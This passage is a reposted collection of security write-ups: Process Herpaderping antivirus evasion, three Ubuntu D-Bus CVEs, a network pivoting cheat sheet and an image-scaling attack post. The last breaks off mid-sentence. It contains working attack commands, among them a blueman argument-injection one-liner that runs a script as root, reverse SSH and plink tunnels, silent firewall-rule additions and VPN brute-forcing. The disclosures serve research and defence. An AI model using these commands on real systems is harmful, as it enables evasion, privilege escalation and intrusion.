Nytro

Process Herpaderping Process Herpaderping is a method of obscuring the intentions of a process by modifying the content on disk after the image has been mapped. This results in curious behavior by security products and the OS itself. Summary Generally, a security product takes action on process creation by registering a callback in the Windows Kernel (PsSetCreateProcessNotifyRoutineEx). At this point, a security product may inspect the file that was used to map the executable and determine if this process should be allowed to execute. This kernel callback is invoked when the initial thread is inserted, not when the process object is created. Because of this, an actor can create and map a process, modify the content of the file, then create the initial thread. A product that does inspection at the creation callback would see the modified content. Additionally, some products use an on-write scanning approach which consists of monitoring for file writes. A familiar optimization here is recording the file has been written to and defer the actual inspection until IRP_MJ_CLEANUP occurs (e.g. the file handle is closed). Thus, an actor using a write -> map -> modify -> execute -> close workflow will subvert on-write scanning that solely relies on inspection at IRP_MJ_CLEANUP. To abuse this convention, we first write a binary to a target file on disk. Then, we map an image of the target file and provide it to the OS to use for process creation. The OS kindly maps the original binary for us. Using the existing file handle, and before creating the initial thread, we modify the target file content to obscure or fake the file backing the image. Some time later, we create the initial thread to begin execution of the original binary. Finally, we will close the target file handle. Let’s walk through this step-by-step: Write target binary to disk, keeping the handle open. This is what will execute in memory. Map the file as an image section (NtCreateSection, SEC_IMAGE). Create the process object using the section handle (NtCreateProcessEx). Using the same target file handle, obscure the file on disk. Create the initial thread in the process (NtCreateThreadEx). At this point the process creation callback in the kernel will fire. The contents on disk do not match what was mapped. Inspection of the file at this point will result in incorrect attribution. Close the handle. IRP_MJ_CLEANUP will occur here. Since we’ve hidden the contents of what is executing, inspection at this point will result in incorrect attribution. plantuml Behavior You’ll see in the demo below, CMD.exe is used as the execution target. The first run overwrites the bytes on disk with a pattern. The second run overwrites CMD.exe with ProcessHacker.exe. The Herpaderping tool fixes up the binary to look as close to ProcessHacker.exe as possible, even retaining the original signature. Note the multiple executions of the same binary and how the process looks to the user compared to what is in the file on disk. Diving Deeper We’ve observed the behavior and some of this may be surprising. Let’s try to explain this behavior. Technical Deep Dive Background and Motivation When designing products for securing Windows platforms, many engineers in this field (myself included) have fallen on preconceived notions with respect to how the OS will handle data. In this scenario, some might expect the file on disk to remain “locked” when the process is created. You can’t delete the file. You can’t write to it. But you can rename it. Seen here, under the right conditions, you can in fact write to it. Remain vigilant on your assumptions, always question them, and do your research. The motivation for this research came about when discovering how to do analysis when a file is written. With prior background researching process Hollowing and Doppelganging, I had theorized this might be possible. The goal is to provide better security. You cannot create a better lock without first understanding how to break the old one. Similar Techniques Herpaderping is similar to Hollowing and Doppelganging however there are some key differences: Process Hollowing Process Hollowing involves modifying the mapped section before execution begins, which abstractly this looks like: map -> modify section -> execute. This workflow results in the intended execution flow of the Hollowed process diverging into unintended code. Doppelganging might be considered a form of Hollowing. However, Hollowing, in my opinion, is closer to injection in that Hollowing usually involves an explicit write to the already mapped code. This differs from Herpaderping where there are no modified sections. Process Doppelganging Process Doppelganging is closer to Herpaderping. Doppelganging abuses transacted file operations and generally involves these steps: transact -> write -> map -> rollback -> execute. In this workflow, the OS will create the image section and account for transactions, so the cached image section ends up being what you wrote to the transaction. The OS has patched this technique. Well, they patched the crash it caused. Maybe they consider this a “legal” use of a transaction. Thankfully, Windows Defender does catch the Doppelganging technique. Doppelganging differs from Herpaderping in that Herpaderping does not rely on transacted file operations. And Defender doesn’t catch Herpaderping. Comparison For reference, the generalized techniques: Type Technique Hollowing map -> modify section -> execute Doppelganging transact -> write -> map -> rollback -> execute Herpaderping write -> map -> modify -> execute -> close We can see the differences laid out here. While Herpaderping is arguably noisier than Doppelganging, in that the malicious bits do hit the disk, we’ve seen that security products are still incapable of detecting Herpaderping. Possible Solution There is not a clear fix here. It seems reasonable that preventing an image section from being mapped/cached when there is write access to the file should close the hole. However, that may or may not be a practical solution. Another option might be to flush the changes to the file through to the cached image section if it hasn’t yet been mapped into a process. However, since the map into the new process occurs at NtCreateProcess that is probably not a viable solution. From a detection standpoint, there is not a great way to identify the actual bits that got mapped, inspection at IRP_MJ_CLEANUP or a callback registered at PsSetCreateProcessNotifyRoutineEx results in incorrect attribution since the bits on disk have been changed, you would have to rebuild the file from the section that got created. It’s worth pointing out here there is a new callback in Windows 10 you may register for PsSetCreateProcessNotifyRoutineEx2 however this suffers from the same problem as the previous callback, it’s called out when the initial thread is executed, not when the process object is created. Microsoft did add PsSetCreateThreadNotifyRoutineEx which is called out when the initial thread is inserted if registered with PsCreateThreadNotifyNonSystem, opposed to when it is about to begin execution (as the old callback did). Extending PSCREATEPROCESSNOTIFYTYPE to be called out when the process object is created won’t help either, we’ve seen in the Diving Deeper section that the image section object is cached on the NtCreateSection call not NtCreateProcess. We can’t easily identify what got executed. We’re left with trying to detect the exploitive behavior by the actor, I’ll leave discovery of the behavior indicators as an exercise for the reader. Known Affected Platforms Below is a list of products and Windows OSes that have been tested as of (8/31/2020). Tests were carried out with a known malicious binary. Operating System Version Vulnerable Windows 7 Enterprise x86 6.1.7601 Yes Windows 10 Pro x64 10.0.18363.900 Yes Windows 10 Pro Insider Preview x64 10.0.20170.1000 Yes Windows 10 Pro Insider Preview x64 10.0.20201.1000 Yes Security Product Version Vulnerable Windows Defender AntiMalware Client 4.18.2006.10 Yes Windows Defender Engine 1.1.17200.2 Yes Windows Defender Antivirus 1.319.1127.0 Yes Windows Defender Antispyware 1.319.1127.0 Yes Windows Defender AntiMalware Client 4.18.2007.6 Yes Windows Defender Engine 1.1.17300.2 Yes Windows Defender Antivirus 1.319.1676.0 Yes Windows Defender Antispyware 1.319.1676.0 Yes Windows Defender AntiMalware Client 4.18.2007.8 Yes Windows Defender Engine 1.1.17400.5 Yes Windows Defender Antivirus 1.323.267.0 Yes Windows Defender Antispyware 1.323.267.0 Yes Responsible Disclosure This vulnerability was disclosed to the Microsoft Security Response Center (MSRC) on 7/17/2020 and a case was opened by MSRC on 7/22/2020. MSRC concluded their investigation on 8/25/2020 and determined the findings are valid but do not meet their bar for immediate servicing. At this time their case is closed, without resolution, and is marked for future review, with no timeline. We disagree on the severity of this bug; this was communicated to MSRC on 8/27/2020. There are similar vulnerabilities in this class (Hollowing and Doppelganging). The vulnerability is shown to defeat security features inherent to the OS (Windows Defender). The vulnerability allows an actor to gain execution of arbitrary code. The user is not notified of the execution of unintended code. The process information presented to the user does not accurately reflect what is executing. Facilities to accurately identify the process are not intuitive or incorrect, even from the kernel. Source This repo contains a tool for exercising the Herpaderping method of process obfuscation. Usage is as follows: Process Herpaderping Tool - Copyright (c) Johnny Shaw ProcessHerpaderping.exe SourceFile TargetFile [ReplacedWith] [Options...] Usage: SourceFile Source file to execute. TargetFile Target file to execute the source from. ReplacedWith File to replace the target with. Optional, default overwrites the binary with a pattern. -h,--help Prints tool usage. -d,--do-not-wait Does not wait for spawned process to exit, default waits. -l,--logging-mask number Specifies the logging mask, defaults to full logging. 0x1 Successes 0x2 Informational 0x4 Warnings 0x8 Errors 0x10 Contextual -q,--quiet Runs quietly, overrides logging mask, no title. -r,--random-obfuscation Uses random bytes rather than a pattern for file obfuscation. -e,--exclusive Target file is created with exclusive access and the handle is held open as long as possible. Without this option the handle has full share access and is closed as soon as possible. -u,--do-not-flush-file Does not flush file after overwrite. -c,--close-file-early Closes file before thread creation (before the process notify callback fires in the kernel). Not valid with "--exclusive" option. -k,--kill Terminates the spawned process regardless of success or failure, this is useful in some automation environments. Forces "--do-not-wait option. Cloning and Building The repo uses submodules, after cloning be sure to init and update the submodules. Projects files are targeted to Visual Studio 2019. git clone https://github.com/jxy-s/herpaderping.git cd .\herpaderping\ git submodule update --init --recursive MSBuild .\herpaderping.sln Credits The following are used without modification. Credits to their authors. Windows Implementation Libraries (WIL) A header-only C++ library created to make life easier for developers on Windows through readable type-safe C++ interfaces for common Windows coding patterns. Process Hacker Native API Headers Collection of Native API header files. Gathered from Microsoft header files and symbol files, as well as a lot of reverse engineering and guessing. Sursa: https://jxy-s.github.io/herpaderping/

A story of three CVE's in Ubuntu Desktop Vaisha Bernard - October 27, 2020 Introduction I had some time off and decided to hunt for some bugs in my Ubuntu Desktop installation. My target was going to be the D-Bus interface. D-Bus (Desktop-Bus) is an Inter-Process Communication (IPC) and remote procedure call (RPC) mechanism that allows communication between multiple processes running concurrently on the same machine. It is used in many Linux distributions nowadays. On Linux desktop environments we have a single system bus, used for communication between user processes and system processes, and for each logon session we have a session bus, for communication between processes in a single desktop session. My target was the system bus. System processes that open up an interface for communication from userland, that sounds like trouble! Getting around My first goal was understanding the syntax and feeling of the D-Bus. There is an excellent interactive tool called D-Feet to make life easier. There is a clear hierarchy in the D-Bus specification. Objects are processes that expose themselves on the D-Bus. An object can implement multiple interfaces and each interface can have multiple methods. D-Bus uses interfaces to provide a namespacing mechanism for methods. An interface also has Properties, which are typed variables that can often be read and sometimes also changed. D-Feet showed which Interfaces are implemented and which methods are available. In the background it uses the Introspect method of the org.freedesktop.DBus.Introspectable interface that is implemented by many objects to do just that. Apart from D-Feet, the most straightforward way to interact with the D-Bus is via the dbus-send shell command. For example the next command calls the ListNames method on the org.freedesktop.DBus Interface and generates the list that D-Feet shows on the left. dbus-send --system --print-reply \ --dest=org.freedesktop.DBus \ /org/freedesktop/DBus \ org.freedesktop.DBus.ListNames For me the most intuitive way to handle multiple interactive calls to D-Bus methods is the python-dbus module. It's easy to script any interaction with a D-Bus method. Many methods are protected with PolicyKit, to make sure the calling user has the right privileges to perform the action. You might have seen these popups, which are the result of a D-Bus method call that is protected by PolicyKit. I was most interested in vulnerabilities that anyone could trigger without authentication, so I focused on methods that were not protected with PolicyKit. Aptdaemon Information Disclosure (CVE-2020-15703) The first bug that I found involves aptdaemon. Once you introspect the org.apt.debian object with D-Feet, you will notice a new running process in your processlist. /usr/bin/python3 /usr/sbin/aptd So aptdaemon is written in python. I could dive into the code, but this time my laziness reached record levels and I just wanted to know what syscalls happened in the background, so I spawned an strace on the process. strace -s 65535 -f -p <PID> I started playing around with a couple of the methods and entering garbage. One method in particular which sounded interesting was the InstallFile method. It requires two arguments, a filepath of the package to install and a Boolean force. If you call the method, aptdaemon creates a D-Bus object called a transaction, which exposes new methods such as Simulate() and Run(). It also has several properties that are writable. Somehow we can simulate installing a .deb package file. I wrote a simple python script to experiment with that. import dbus bus = dbus.SystemBus() apt_dbus_object = bus.get_object("org.debian.apt", "/org/debian/apt") apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.debian.apt") # just use any valid .deb file trans = apt_dbus_interface.InstallFile("/var/cache/apt/archives/dbus_1.12.16-2ubuntu2.1_amd64.deb", False) apt_trans_dbus_object = bus.get_object("org.debian.apt", trans) apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.debian.apt.transaction") apt_trans_dbus_interface.Simulate() Well this does absolutely nothing. The Run() method which would actually install the .deb file requires authorization. But while playing around I noticed the locale property, which could be set as follows. properties_manager = dbus.Interface(apt_trans_dbus_interface, 'org.freedesktop.DBus.Properties') properties_manager.Set("org.debian.apt.transaction", "Locale", "AAAA") This results in the following error message. Traceback (most recent call last): File "/usr/lib/python3/dist-packages/defer/__init__.py", line 487, in _inline_callbacks result = gen.send(result) File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 1226, in _set_property self._set_locale(value) File "/usr/lib/python3/dist-packages/aptdaemon/core.py", line 826, in _set_locale (lang, encoding) = locale._parse_localename(str(locale_str)) File "/usr/lib/python3.8/locale.py", line 499, in _parse_localename raise ValueError('unknown locale: %s' % localename) ValueError: unknown locale: AAAA The _parse_localename method, upon other things mainly checks if there is a "." In the locale name. The following call succeeds. properties_manager.Set("org.debian.apt.transaction", "Locale", "AA.BB") But my eye caught something interesting here in the strace output. [pid 23275] stat("/usr/share/locale/AA/LC_MESSAGES/aptdaemon.mo", 0x7ffe616b0740) = -1 ENOENT (No such file or directory) I changed the value to "/tmp.BB", and voila. [pid 23275] stat("/tmp/LC_MESSAGES/aptdaemon.mo", 0x7ffe616b0740) = -1 ENOENT (No such file or directory) This looks like I can have it read any .mo locale file here. I spent a couple of hours reversing the .mo format and can now tell you all about the structure of the .po format which it is generated from, but I could not get it to do anything interesting. Then I realized I could make a symlink called /tmp/LC_MESSAGES/aptdaemon.mo and point it to any file on the filesystem. For example to "/root/.bashrc". ln -s /root/.bashrc /tmp/LC_MESSAGES/aptdaemon.mo That results in another error. OSError: [Errno 0] Bad magic number: '/tmp/LC_MESSAGES/aptdaemon.mo' But it discloses information that I'm not supposed to be able to know, the existence of any file on the filesystem, for example in /root, where an unprivileged user should not be able to look into. A very small bug, but a bug nonetheless. PackageKit Information Disclosure (CVE-2020-16121) I found a similar bug in PackageKit. After the whole ordeal with aptdaemon, this one popped up immediately. The org.freedesktop.PackageKit Interface on the /org/freedesktop/PackageKit object has a method CreateTransaction(). This creates a Transaction object which, among others, has the InstallFiles(), GetFilesLocal() and GetDetailsLocal() methods. All methods have a list of filepaths as their argument. Again, this allows us to determine the existence of any file on the filesystem, but this time if a file exists we also get an error message that discloses the MIME type. A simple python script demonstrates this. import dbus bus = dbus.SystemBus() apt_dbus_object = bus.get_object("org.freedesktop.PackageKit", "/org/freedesktop/PackageKit") apt_dbus_interface = dbus.Interface(apt_dbus_object, "org.freedesktop.PackageKit") trans = apt_dbus_interface.CreateTransaction() apt_trans_dbus_object = bus.get_object("org.freedesktop.PackageKit", trans) apt_trans_dbus_interface = dbus.Interface(apt_trans_dbus_object, "org.freedesktop.PackageKit.Transaction") apt_trans_dbus_interface.InstallFiles(0, ["/root/.bashrc"]) This results in the error message: MIME type text/plain not supported. Blueman Local Privilege Escalation or Denial of Service (CVE-2020-15238) This bug is a little more interesting. Playing around with the D-Bus methods of the org.blueman.Mechanism interface I noticed I was never asked for authorization. This was going to be an interesting target. The developer of the package later confirmed that there was an issue with the Debian package: It only recommends policykit-1 but blueman does not support "runtime-optional" Polkit-1 support. You have to decide during the build and as libpolkit-agent-1-dev is not a build dependency Polkit-1 support is always disabled. Thumbs up for the developer by the way, he jumped onto this bug immediately and pushed out a fix in no time, while also coordinating a release date between the Ubuntu and Debian security teams. The DhcpClient() method soon caught my attention. It requires a single string as argument. Let's check with strace what syscalls are sent in the background. I used this oneliner to bring up the daemon and attach an strace process to it without worrying too much about the short time it's alive or the PID. dbus-send --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.freedesktop.DBus.Introspectable.Introspect && \ strace -f -s 65535 -e execve -p \ $(pgrep -f blueman-mechanism) Then I fired off my first test. dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"AAAA" There is a lot of output from the strace process, but filtering on "execve" provided a very interesting observation. [pid 30096] execve("/usr/sbin/dhclient", ["/usr/sbin/dhclient", "-e", "IF_METRIC=100", "-1", "AAAA"], 0x7ffd6facb700 /* 4 vars */) = 0 [pid 30104] execve("/sbin/dhclient-script", ["/sbin/dhclient-script"], 0x55c8e9ae11e0 /* 6 vars */) = 0 [pid 30105] execve("/usr/bin/run-parts", ["run-parts", "--list", "/etc/dhcp/dhclient-enter-hooks.d"], 0x556ae347a3c8 /* 12 vars */) = 0 [pid 30106] execve("/usr/sbin/avahi-autoipd", ["/usr/sbin/avahi-autoipd", "-c", "AAAA"], 0x556ae347acf0 /* 12 vars */) = 0 [pid 30107] execve("/usr/sbin/ip", ["ip", "link", "set", "dev", "AAAA", "up"], 0x556ae3483178 /* 12 vars */) = 0 [pid 30110] execve("/usr/bin/run-parts", ["run-parts", "--list", "/etc/dhcp/dhclient-exit-hooks.d"], 0x556ae34824d8 /* 12 vars */) = 0 Oh my! That's a lot of execution happening in the background. It seems my parameter is used as an argument to dhclient, avahi-autopid and ip. Let's see what we can do with that. I dove into the dhclient manual to see if there are any interesting arguments I could use. The following stood out. -sf script-file Path to the network configuration script invoked by dhclient when it gets a lease. If unspecified, the default /sbin/dhclient-script is used. See dhclient-script(8) for a description of this file. Indeed if I run the command "dhclient -sf /tmp/eye" as root, the dhclient starts running in the background, requests a new DHCP lease and finally runs the shell script "/tmp/eye". Let's see what happens if we try this with our blueman-mechanism method. dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"-sf /tmp/eye" Well, that failed. Let's see why. From the strace output we notice the following. [pid 30541] execve("/usr/sbin/dhclient", ["/usr/sbin/dhclient", "-e", "IF_METRIC=100", "-1", "-sf /tmp/eye"], 0x7ffe012977c0 /* 4 vars */ <unfinished ...> ... [pid 30542] sendto(3, "<27>Oct 26 10:40:46 dhclient[30542]: Unknown command: -sf /tmp/x", 64, MSG_NOSIGNAL, NULL, 0) = 64 ... [pid 30542] sendto(3, "<27>Oct 26 10:40:46 dhclient[30542]: Usage: dhclient [-4|-6] [-SNTPRI1dvrxi] [-nw] [-p <port>] [-D LL|LLT]\n [--dad-wait-time <seconds>] [--prefix-len-hint <length>]\n [--decline-wait-time <seconds>]\n [--address-prefix-len <length>]\n [-s server-addr] [-cf config-file]\n [-df duid-file] [-lf lease-file]\n [-pf pid-file] [--no-pid] [-e VAR=val]\n [-sf script-file] [interface]*\n dhclient {--version|--help|-h}", 515, MSG_NOSIGNAL, NULL, 0) = 515 The dhclient binary has a very specific way of parsing arguments and as we can see the "-sf /tmp/eye" argument is parsed as a single flag that does not exist. Some binaries would allow "-sf=/tmp/eye" or "-sf/tmp/eye", but the pickiness of dhclient saved the day here, otherwise this would be a very critical bug. Now let's see if we can inject into the arguments of the ip command. dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"ens33 down" dhclient complains, but the execution continues. [pid 30687] sendto(3, "<27>Oct 26 10:46:05 dhclient[30687]: Error getting hardware address for \"ens33 down\": No such device", 100, MSG_NOSIGNAL, NULL, 0) = 100 Here we see the injection into the ip command. This time our argument is split into multiple arguments, so we can play around a little more with arguments to the ip command. [pid 30694] execve("/usr/sbin/ip", ["ip", "link", "set", "dev", "ens33", "down", "up"], 0x55d963cbd180 /* 12 vars */ <unfinished ...> That's funny, this is actually valid syntax and the interface is kept up. Now, how to get around the up that's added? dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"ens33 down alias" [pid 30752] sendto(3, "<27>Oct 26 10:51:50 dhclient[30752]: ens33 down alias: interface name too long (is 16)", 86, MSG_NOSIGNAL, NULL, 0strace: Process 30755 attached Ah! This error has dhclient exit with a different return code and the execution flow does not reach the ip command. So we're limited to 15 characters here. But ip also accepts shorthand versions so al is an alias for alias. dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"ens33 down al" [pid 30888] execve("/usr/sbin/ip", ["ip", "link", "set", "dev", "ens33", "down", "al", "up"], 0x55c24f67f188 /* 12 vars */) = 0 This indeed brings the interface down and creates an alias up for ens33. That is a DoS vulnerability as any low privileged user can trigger this. Let's see if we can find other interesting arguments to the ip command. From the ip-link manual. xdp object | pinned | off set (or unset) a XDP ("eXpress Data Path") BPF program to run on every packet at driver level. ip link output will indicate a xdp flag for the networking device. If the driver does not have native XDP support, the kernel will fall back to a slower, driver-independent "generic" XDP variant. The ip link output will in that case indicate xdpgeneric instead of xdp only. If the driver does have native XDP support, but the program is loaded under xdpgeneric object | pinned then the kernel will use the generic XDP variant instead of the native one. xdpdrv has the op‐ posite effect of requestsing that the automatic fallback to the generic XDP variant be disabled and in case driver is not XDP-capable error should be returned. xdpdrv also disables hardware offloads. xdpoffload in ip link output indicates that the program has been offloaded to hardware and can also be used to request the "offload" mode, much like xdpgeneric it forces program to be installed specifically in HW/FW of the apater. object FILE - Attaches a XDP/BPF program to the given device. The FILE points to a BPF ELF file (f.e. generated by LLVM) that contains the BPF program code, map specifications, etc. If a XDP/BPF program is already attached to the given device, an error will be thrown. If no XDP/BPF program is currently attached, the device supports XDP and the program from the BPF ELF file passes the kernel verifier, then it will be attached to the device. If the option -force is passed to ip then any prior attached XDP/BPF program will be atomically overridden and no error will be thrown in this case. If no section option is passed, then the default section name ("prog") will be assumed, otherwise the provided section name will be used. If no verbose option is passed, then a verifier log will only be dumped on load error. See also EXAMPLES section for usage examples. So I can attach an XDP object to any interface. That would require a little more than 15 characters. How to bring that down? Let's rename the interface first! dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"ens33 down al" dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"ens33 name a" dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"a xdp o /tmp/o" Ok, so now we can attach an XDP object to any interface. I could dive deeper into how XDP and eBPF works and if there would be any security issues related to the fact I can now attach such an object to any interface, but that's a huge new project. If there are any experts out there, please let me know if you manage to get code execution with this method! Finally, I discovered that blueman also supports other DHCP clients. From the blueman code: COMMANDS = [ ["dhclient", "-e", "IF_METRIC=100", "-1"], ["dhcpcd", "-m", "100"], ["udhcpc", "-t", "20", "-x", "hostname", socket.gethostname(), "-n", "-i"] ] for command in self.COMMANDS: path = have(command[0]) if path: self._command = [path] + command[1:] + [self._interface] So if dhclient is not available, but dhcpcd is, we have another possibility to get code execution. Luckily (for us), dhcpcd also has the ability to run a script and is a lot less picky in its argument format. This leaves us with a Local Privilege Escalation oneliner that works on any Ubuntu or Debian system that has dhcpcd instead of dhclient. dbus-send --print-reply --system \ --dest=org.blueman.Mechanism \ /org/blueman/mechanism \ org.blueman.Mechanism.DhcpClient \ string:"-c/tmp/eye" Any unprivileged user can run this and any code put in the shellscript /tmp/eye is run as root! Conclusions There are always bugs out there. Programs like hackerone and bugcrowd are amazing opportunities for companies to tighten their security by offering security researchers substantial amounts of money for reported vulnerabilities. But the open source community needs our help as well. So once in a while, give a shot at it for fun instead of profit. Thanks to the Ubuntu security team and Christopher Schramm, the developer of Blueman, for their quick and friendly response and hard work to fix these issues. Sursa: https://www.eyecontrol.nl/blog/the-story-of-3-cves-in-ubuntu-desktop.html

An elevation of privilege vulnerability exists when Group Policy improperly checks access, aka 'Group Policy Elevation of Privilege Vulnerability'. Sursa; https://github.com/rogue-kdc/CVE-2020-16939

Network Pivoting and Tunneling Guide This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power... Written by Sajal JainOct 22 · 2 min read This is for pure educational & informational purpose. Only use these techniques where allowed or you have permission to do so. Power comes with great responsibility. Port Forwarding – accept traffic on a given IP address and port and redirect it to a different IP address and port apt-get install rinetd cat /etc/rinetd.conf # bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80 SSH Local Port Forwarding: supports bi-directional communication channels ssh <gateway> -L <local port to listen>:<remote host>:<remote port> SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network ssh <gateway> -R <remote port to bind>:<local host>:<local port> SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT ssh -D <local proxy port> -p <remote port> <target> Proxychains – Perform Nmap scan within a DMZ from an external computer Create a reverse SSH tunnel from the Popped machine on: 2222 ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com ssh -f -N -R 2222:<local host>:22 root@<remote host> Create a Dynamic application-level port forward on 8080 thru 2222 ssh -f -N -D &lt;local host>:8080 -p 2222 hax0r@<remote host> Leverage the SSH SOCKS server to perform Nmap scan on the network using proxy chains proxychains nmap --top-ports=20 -sT -Pn $ip/24 HTTP Tunneling nc -vvn $ip 8888 Traffic Encapsulation – Bypassing deep packet inspection HTTP tunnel On the server-side: sudo hts -F <server ip addr>:<port of your app> 80 On the client-side: sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network Tunnel on port 22 plink -l root -pw pass -R 3389:<localhost>:3389 <remote host> Port 22 blocked? Try port 80? or 443? plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80 Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection) Windows machine add required firewall rules without prompting the user netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000 netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080 netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079 Start the http tunnel client httptunnel_client.exe Create HTTP reverse shell by connecting to localhost port 3000 plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000 VLAN Hopping git clone https://github.com/nccgroup/vlan-hopping.git chmod 700 frogger.sh ./frogger.sh VPN Overtaking Identify VPN servers: ./udp-protocol-scanner.pl -p ike $ip Scan a range for VPN servers: ./udp-protocol-scanner.pl -p ike -f ip.txt Use IKEForce to enumerate or dictionary attack VPN servers: pip install pyip git clone https://github.com/SpiderLabs/ikeforce.git Perform IKE VPN enumeration with IKEForce: ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic Bruteforce IKE VPN using IKEForce: ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 Use ike-scan to capture the PSK hash: ike-scan ike-scan TARGET-IP ike-scan -A TARGET-IP ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP Use psk-crack to crack the PSK hash: psk-crack hash-file.txt pskcrack psk-crack -b 5 TARGET-IPkey psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key psk-crack -d /path/to/dictionary-file TARGET-IP-key PPTP Overtaking Identifying PPTP, it listens on TCP: 1723 NMAP PPTP Fingerprint: nmap –Pn -sV -p 1723 TARGET(S) PPTP Dictionary Attack thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst Port Forwarding/Redirection PuTTY Link tunnel – SSH Tunneling Forward remote port to local address: plink.exe -P 22 -l root -pw "1337" -R 445:<local host>:445 <remote host> SSH Pivoting SSH pivoting from one network to another: ssh -D <local host>:1010 -p 22 user@<remote host> DNS Tunneling dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine. Attacking Machine Installation: apt-get update apt-get -y install ruby-dev git make g++ gem install bundler git clone https://github.com/iagox86/dnscat2.git cd dnscat2/server bundle install Run dnscat2: ruby ./dnscat2.rb dnscat2> New session established: 1422 dnscat2> session -i 1422 DISCLAIMER: Everything is gathered from different web-resources. Parts of the above writeup belong to unknown authors. Written by Sajal Jain Cyber Security Enthusiast | OSCP | CEH | CHFI | CNSS | Masters of IT (Major: IT Security) & Masters of IT Management from the University of Sydney. Sursa: https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/

Linux (x86) Exploit Development Series Posted on June 26, 2015 by sploitfun First of all I would like to thank phrack articles, its author and other security researchers for teaching me about different exploit techniques, without whom none of the posts would have been possible!! I firmly believe that always original reference articles are the best place to learn stuffs. But at times we may struggle to understand it because it may be not be linear and it may be outdated too. So to the best of my efforts, here I have just simplified and conglomerated different exploit techniques under one roof, inorder to provide a complete understanding about linux exploit development to beginners!! Any questions, corrections and feedbacks are most welcomed!! Now buckle up, lets get started!! I have divided this tutorial series in to three levels: Level 1: Basic Vulnerabilities In this level I will introduce basic vulnerability classes and also lets travel back in time, to learn how linux exploit development was carried back then. To achieve this time travel, with current linux operating system, I have disabled many security protection mechanisms (like ASLR, Stack Canary, NX and PIE). So in a sense this level is kids stuff, no real fun happens!! Classic Stack Based Buffer Overflow Integer Overflow Off-By-One (Stack Based) Level 2: Bypassing Exploit Mitigation Techniques In this level lets get back to current days, to learn how to bypass different exploit mitigation techniques (like ASLR, Stack Canary, NX and PIE). Real fun do happen here!! Bypassing NX bit using return-to-libc Bypassing NX bit using chained return-to-libc Bypasing ASLR Part I using return-to-plt Part II using brute force Part III using GOT overwrite and GOT dereference Level 3: Heap Vulnerabilities In this level lets time travel back and forth, to learn about heap memory corruption bugs. Heap overflow using unlink Heap overflow using Malloc Maleficarum Off-By-One (Heap Based) Use After Free NOTE: The above list is NOT a complete list. Few more topics needs to be covered up. I am working on it, so expect it to be posted soon!! Sursa: https://sploitfun.wordpress.com/2015/06/26/linux-x86-exploit-development-tutorial-series/

Machine Learning Attack Series: Image Scaling Attacks Posted on Oct 28, 2020 #machine learning #huskyai #red This post is part of a series about machine learning and artificial intelligence. Click on the blog tag “huskyai” to see related posts. Overview: How Husky AI was built, threat modeled and operationalized Attacks: Some of the attacks I want to investigate, learn about, and try out A few weeks ago while preparing demos for my GrayHat 2020 - Red Team Village presentation I ran across “Image Scaling Attacks” in Adversarial Preprocessing: Understanding and Preventing Image-Scaling Attacks in Machine Learning by Erwin Quiring, et al. I thought that was so cool! What is an image scaling attack? The basic idea is to hide a smaller image inside a larger image (it should be about 5-10x the size). The attack is easy to explain actually: Attacker crafts a malicious input image by hiding the desired target image inside a benign image The image is loaded by the server Pre-processing resizes the image The server acts and makes decision based on a different image then intended My goal was to hide a husky image inside another image: Here are the two images I used - before and after the modification: If you look closely, you can see that the second image does have some strange dots all around. But this is not noticable when viewed in smaller version. You can find the code on Github. I used Google Colab to run it, and there were some errors initialy but it worked - let me know if interested and I can clean up and share the Notebook also. Rescaling and magic happens! Now, look what happens when the image is loaded and resized with OpenCV using default settings: On the left you can see the original sized image, and on the left the same image downsized to 128x128 pixels. That’s amazing! The downsized image is an entirely different picture now! Of course I picked a husky, since I wanted to attack “Husky AI” and find another bypass. Implications This can have a set of implications: Training process: Images that poisen the training data 